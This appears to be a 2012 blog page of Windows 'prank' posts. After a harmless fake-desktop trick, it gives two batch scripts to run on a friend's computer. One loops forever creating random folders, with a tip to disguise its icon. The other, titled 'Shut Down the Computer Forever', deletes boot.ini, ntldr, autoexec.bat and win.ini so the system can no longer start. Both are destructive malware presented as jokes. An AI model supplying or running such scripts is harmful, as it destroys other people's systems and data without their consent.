Pages

Showing posts with label Pranks. Show all posts
Showing posts with label Pranks. Show all posts

Wednesday, April 11, 2012

Cool Windows Prank

This will make it to where your friend cannot click on anything on the screen.


1. Take a screenshot of the desktop. You can use windows printscreen key.(next to F12 key)
2. Make your printscreen picture as desktop background.
3. Save that in ms paint.
and set that image as ur background.
4. Right click on desktop , then click Arrange Icons By->Show Desktop Icons 
That is it , when you click on the “icons”, nothing will happen!
Hope you'll have a lot of fun after seeing ppl clicking on icon which doesn't react. :)

1000 Folders at 1 Click

Make 1,000 folders in few seconds


Here I will teach you simple prank that will make an unlimited amount offolders in any place you want.


1. Open notepad and type :
@echo off
:top
md %random%
goto top 
2. Save it as 1000folders.bat.
3. After that you will get a unknown icon so u better change the icon
4. Right click on icon >properties>customize>change icon.
Changing icon is optional.

Sunday, April 8, 2012

Shut Down the Computer Forever



Open notepad and copy/paste this code:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini